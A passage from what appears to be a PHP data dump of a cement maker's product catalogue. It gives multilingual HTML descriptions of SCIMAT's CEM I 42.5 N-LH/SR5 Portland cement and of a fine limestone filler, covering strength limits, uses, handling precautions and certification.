<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الخصائص الكيميائية ، التي تعتبر عاملاً مهماً في مقاومة الخرسانة للبيئات العدوانية ، تتعلق بمحتوى أنهيدريد الكبريت (SO3) الذي يقل عن 3.0٪ (3.5٪ للفئتين 42.5 R و 52.5) وفي أيونات الكلوريد الأقل من 0.10 ٪.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>رقابة الجودة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تقوم SCIMAT بان<span style="color:#000000">ت</span>اج وتسويق الأسمنت عالي <strong>الجودة</strong> وفقًا للمعايير الجزائرية المعمول بها. يتم فحصها بشكل دوري من قبل مركز الدراسات والخدمات ا<span style="color:#000000">لتكنولوجية </span>لصناعة مواد البناء -CETIM-(المعتمد وفقًا لمعيار ISO 17025).</span></span></p>
<p dir="rtl" style="text-align:justify"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><strong><u>مجالات الاستعمال</u></strong></span><span style="color:#008000"><strong><u> الرئيسية</u> :</strong></span></span></span></small></p>
<p dir="rtl" style="text-align:justify"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong> <strong>CEM I / 42.5 N-LH / SR5</strong> مناسب للخرسانة المسلحة أو الخرسانة </span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">سابقة الإجهاد ، من ناحية أخرى فإن خصائصها الميكانيكية لا تبرر بشكل عام استخدامها لأعمال البناء العادية والخرسانة في كتلة كبيرة أو مقواة بشكل ضعيف.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يسمح </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> بتقشير سريع ملموس ، خاصة في التصنيع المسبق. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">للعمل في بيئة عدوانية أو مياه البحر أو المياه الكبريتية ، سيتم استخدام أسمنت بورتلاند <strong>CEM I 42.5 N-LH / SR5</strong> على التوالي للعمل في البحر مساءً ، أو للعمل في الماء الذي يحتوي على نسبة عالية من الكبريتات.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="color:#008000"><u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إحتياطات خاصة</span></span></strong></u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> : </span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">بالنسبة للهياكل الضخمة ، تجنب استخدام <strong> </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> ، حيث قد تؤدي حرارة الماء إلى ارتفاع مفرط في درجة الحرارة أثناء بنائها.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>توصيات محددة وعامة</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام ركام نظيف وخالي من المواد العضوية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> احترام الجرعات وقواعد فن التنفيذ ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تهدف إلى نسبة الماء / الأسمنت ، ويفضل أن تكون منخفضة قدر الإمكان ، ومتوافقة مع الانسيابية الجيدة للخرسانة الطازجة ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام مواد مساعدة معيارية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب الجفاف المبكر في الطقس الحار أو العاصف عن طريق معالجة الخرسانة (الري ، القماش المشمع الرطب ، منتجات المعالجة ، إلخ) ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تكييف اهتزازات الخرسانة مع قوامها للحصول على تماسك أمثل بدون فصل ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة الجلد والعينين ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدم المعدات المناسبة: القفازات ، والأحذية المقاومة للماء ، والنظارات ، وما إلى ذلك.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="color:#FF0000"><u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحماية</span></span></strong></u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون الشركة الأكثر أمانًا في المجتمع من خلال تحسين ظروف العمل لتجنب أي إصابات جسدية وتداعيات صحية مرتبطة بأنشطتها</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>تدابير وقائية</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> يخلط مع الماء ، والأسمنت مزعج.</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة العينين والجلد؛</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> اغسل جميع المناطق المكشوفة على الفور بكمية كبيرة من الماء ؛</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> في حالة ملامسة العين لا بد من استشارة الطبيب.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">لمزيد من التفاصيل ، يرجى الرجوع إلى ورقة بيانات السلامة التفصيلية. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>البيئة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون بشكل دائم مثالاً للمسؤولية البيئية للمجتمع من خلال حماية البيئة ، بما في ذلك منع التلوث واستخدام الموارد المستدامة من خلال :</span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحفاظ على الموارد الطبيعية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحد من انبعاثات الغلاف الجوي ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التمكن من إدارة النفايات</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>التخزين</u> : </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب تخزين الأسمنت في مكان جاف وحمايته من الرطوبة</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong></strong></span></span></span><br />
</p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#40E0D0"><u><strong>التكييف</strong></u><strong> : </strong></span><span style="color:#008000"><strong> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تسليم </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong></span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> سائبًا وفي أكياس سعة 50 كجم. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000080"><strong> <u>الشهادة</u> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">تم اعتماد <strong>الاسمنت</strong> <strong>CEM I / 42.5 N-LH/SR5</strong> وفقًا للمعيار الجزائري <strong>2013/442</strong> مع علامة المطابقة الوطنية <strong>TEDJ</strong> الصادرة عن المعهد الجزائري للتقييس</span></span></p>
</div>
</div>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>The Cement CEM I / 42.5 N-LH / SR5 -NA 442 / 2013</strong>- is a Portland Cement resulting from the grinding of clinker and calcium sulphate (gypsum or anhydrite) to regulate the setting, and possibly secondary constituents in small quantities at 5 %. The clinker content is at least 95%.</span></span></p>
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><strong>Compressive strength limit value for CEM I 42.5N SR 5</strong></span></span></span></p>
<div style="clear:both;">
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:370px; width:425px">
<tbody>
<tr>
<td style="height:104px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Resistance Class</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:104px; width:145px">
<pre style="text-align:center">
<span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Limit of Resistance according to the Standard NA 442
</strong></span></span></pre>
</td>
<td style="height:104px; width:123px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Specified Lower Limit<br />
of our Cement</span></span></strong></p>
<p style="text-align:center"> </p>
</td>
<td style="height:104px; width:139px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Specified Upper Limit of our Cement</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:30px; width:117px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>02 days</strong></span></span></p>
</td>
<td style="height:30px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:30px; width:123px">
<p style="text-align:center"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>21,36</strong></span></span></small></p>
</td>
<td style="height:30px; width:139px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">27,71</span></span></strong></p>
</td>
</tr>
<tr>
<td style="height:51px; width:117px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>28 days</strong></span></span></p>
</td>
<td style="height:51px; width:145px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">62.5≤res≥42,5</span></strong></span></span></p>
</td>
<td style="height:51px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">44,82</span></strong></span></span></p>
</td>
<td style="height:51px; width:139px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">54,53</span></span></strong></p>
</td>
</tr>
</tbody>
</table>
<div style="clear:both;"> </div>
<div style="clear:both;">
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The chemical properties, which are an important factor in the resistance of concrete to aggressive environments, concern the sulfuric anhydride (SO3) content of less than 3.0% (3.5% for classes 42.5 R and 52.5) and in chloride ions less than 0.10%.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Quality Control</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">SCIMAT manufactures and markets <strong>Quality</strong> Cements in accordance with Algerian Standards in force. They are periodically checked by the Center for Studies and Technological Services of the Building Materials Industry -CETIM- (accredited according to the ISO 17025 Standard).</span></span></p>
<p style="text-align:left"><small><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Main fields of employment</strong></u><strong> :</strong></span></span></span></small></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement CEM I / 42.5 N-LH / SR5</strong> is suitable for reinforced concrete or prestressed concrete, on the other hand its mechanical characteristics do not generally justify its use for ordinary masonry work and large mass or weakly reinforced concrete.<br />
<strong>The Cement CEM I / 42.5 N-LH / SR5</strong> allows appreciable rapid stripping, especially in prefabrication.<br />
For work in an aggressive environment, sea water or sulphated water, Portland Cement CEM I 42.5 N-LH / SR5 will be used respectively for work at sea PM, or for work in water with a high content of ES sulphates.</span></span></span></p>
<p style="text-align:left"><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Special precautions</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">For massive structures, avoid the use of the<strong> Cement CEM I 42.5 N-LH / SR5</strong>, the heat of hydration of which may lead to an excessive rise in temperature during their construction.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Specific and General Recommendations</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use clean aggregates, free from organic matter;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Respect the dosages and the rules of the art for the<br />
implementation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Aim for a Water /Cement ratio, preferably as low<br />
as possible, compatible with good rheology of<br />
fresh concrete;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use standardized adjuvants;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid premature drying out in hot or windy weather by curing the concrete (watering, damp tarpaulin, curing products, etc.); </span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Adapt the vibration of the concrete to its consistency<br />
to obtain optimum compactness without segregation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid all contact with skin and eyes;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use suitable equipment : gloves, waterproof shoes, glasses, etc.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><strong><u>Security</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The SCIMAT aims to be the safest employer in the Society by improving working conditions to avoid any bodily injury and health repercussions related to its activities.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Protective Measures</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mix with water, the Cement is irritating;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Avoid contact with eyes and skin;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Immediately wash all exposed areas with plenty of water;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> In the event of contact with the eyes, it is essential to consult a doctor.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">For more details, please refer to the detailed Safety Data Sheet.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Environment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">The SCIMAT aims to be a constant example of the ecological responsibility of the </span>Society<span style="color:#000000"> through the protection of the environment, including the prevention of pollution and the use of sustainable resources by:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Preservation of natural resources;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Reduction of atmospheric emissions;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mastery of waste management.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><u><strong>Storage</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The Cement must be stored in a dry place and protected from humidity.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>Conditioning</u> :</strong></span><br />
The </span></span><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>Cement CEM I / 42.5 N-LH / SR5</strong></span></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>-NA 442/2013-</strong> is delivered in bulk and in bags of 50 kg.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#4B0082">Certification</span></strong></u><strong><span style="color:#4B0082"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement CEM I / 42.5 N-LH / SR5</strong></span></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> is certified according to the <strong>Algerian Standard 442/2013</strong> with the National Conformity Mark <strong>TEDJ</strong> issued by the Algerian Institute for Standardization -IANOR-.</span></span></p>
</div>
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-rmn-container">
<p style="text-align:left"> </p>
</div>
<p> </p>
</div>
</div>
',
'img_prd' => 'produit-1716888919.png',
'img_prd_detail' => '',
'Code_Pr' => '89963',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1709106473.pdf',
'pos_slider' => '8'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 7 => array(
'Produit' => array(
'id' => '59998',
'nom_fr' => 'Filler 0/0,063 mm ',
'nom_ara' => 'Filler 0/0,063 mm الحشو 0 / 0.063 مم ',
'nom_en' => 'Filler 0/0,063 mm ',
'sous_nom_fr' => '',
'sous_nom_ara' => '',
'sous_nom_en' => '',
'date_ajout' => '2021-01-26',
'image' => '',
'contenu_fr' => '<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm</strong> est un granulat fin destiné à remplir, à charger divers produits des industries du BTP. </span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm </strong>est une<strong> </strong>matière minérale, finement divisée destinée à remplir (de l'Anglais to fill) les vides laissés par un empilement granulaire de graviers, gravillons et sables. </span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le terme <strong>Filler</strong> se rapporte à la petite taille des grains qui le constitue. La nature chimico- minéralogique du <strong>Filler</strong> peut varier, il s'agit généralement de calcaire broyé mais les cendres volantes, la fumée de silice ou une combinaison de ces matériaux peut être utilisée comme <strong>Filler</strong>. </span></span></small></span></p>
<ul>
</ul>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></small></span></p>
<p><span style="color:#008000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><u>Utilisations</u> :</strong></span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm </strong>charge :</span></span></small></span></p>
<ul>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">L'asphalte artificiel à des doses voisines de 10 %, pour son pouvoir rigidifiant ;</span></span></small></span></p>
</li>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Les enrobés bitumineux ,à des doses voisines de 3 à 4 % ou 5 à 6 %, pour son pouvoir rigidifiant ;</span></span></small></span></p>
</li>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Les bétons de ciment hydraulique, à des doses voisines de 50 à 80 kg par m<sup>3</sup>, comme substitution du ciment ; il s'agit le plus souvent de la fumée de silice (micro- ou nanoparticules issues de la métallurgie du silicium et de ses alliages).</span></span></small></span></p>
</li>
</ul>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">L'utilisation des <strong>Fillers</strong> dans des dosages appropriés dans la formulation des bétons permet d'améliorer les propriétés d'écoulement du béton frais et les résistances mécaniques du béton durcis.</span></span></small></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم</strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">- عبارة عن </span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">رمل</span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> ناعم مخصص لملء وتحميل منتجات مختلفة<small> من صناعات البناء.</small></span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم</strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> عبارة عن مادة معدنية مجزأة بدقة تهدف إلى ملء (من الإنجليزية ملء) الفراغات التي تتركها كومة حبيبية من الحصى والشظايا والرمال.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يشير مصطلح <strong>فيلر</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler </strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> إلى صغر حجم الحبوب التي تتكون منها. يمكن أن تختلف الطبيعة الكيميائية المعدنية للحشو ، وعادة ما يكون من الحجر الجيري المطحون ولكن يمكن استخدام الرماد المتطاير أو دخان السيليكا أو مزيج من هذه المواد كمواد مالئة.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يتم التحكم في </span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم </strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> وفقًا لمعيار <strong>NA</strong> <strong>5113</strong>.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:20px"><span style="color:#008000"><strong><small><u>مجال الاستعمال</u> :</small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يملأ <strong>الحشو 0 / 0.063 </strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong><span style="color:#000000"> -</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></small></p>
<ul dir="rtl">
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إسفلت صناعي بجرعات تقترب من 10٪ لقدرته على التقوية ؛</span></span></small></li>
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الخلائط البيتومينية بجرعات تقارب 3 إلى 4٪ أو 5 إلى 6٪ لقوتها التقوية ؛</span></span></small></li>
<li style="text-align: justify;"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">خرسانة </span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الأسمنت الهيدروليكي ، بجرعات قريبة من 50 إلى 80 كجم لكل متر مكعب ، كبديل للأسمنت ؛ غالبًا ما يكون دخان السيليكا (جزيئات دقيقة أو نانوية من تعدين السيليكون وسبائكه)</span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">.</span></span></small></li>
</ul>
<p dir="rtl" style="text-align: justify;"> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">إن استخدام <span style="color:#000000">-<strong>Fillers </strong>-</span> بالجرعات المناسبة في صياغة الخرسانة يجعل من الممكن تحسين خصائص التدفق للخرسانة الطازجة والقوة الميكانيكية للخرسانة المتصلدة.</span></span> </p>
',
'contenu_en' => '<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> is a fine aggregate intended to fill, to load various products of the construction industries.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> is a finely divided mineral material intended to fill the voids left by a granular pile of gravel, chippings and sands.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The term <strong>Filler </strong>refers to the small size of the grains that constitute it. The chemico-mineralogical nature of the <strong>Filler</strong> can vary, it is usually ground limestone but fly ash, silica fume or a combination of these can be used as a <strong>Filler</strong>.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler</strong> <strong>0/0.063 mm</strong> is controlled according to the <strong>NA 5113 </strong>Standard.</span></span></span></p>
<p style="text-align:left"><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>Uses</u> :</span></span></strong></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> charges:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Artificial asphalt at doses close to 10%, for its </span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">stiffening power;</span></span></span></li>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Bituminous mixes, at doses close to 3 to 4% or 5 to 6%, for its stiffening power;</span></span></span></li>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Hydraulic cement concretes, at doses close to 50 to 80 kg per m3, as a replacement for cement; it is most often silica fume (micro- or nanoparticles from the metallurgy of silicon and its alloys).</span></span></span></li>
</ul>
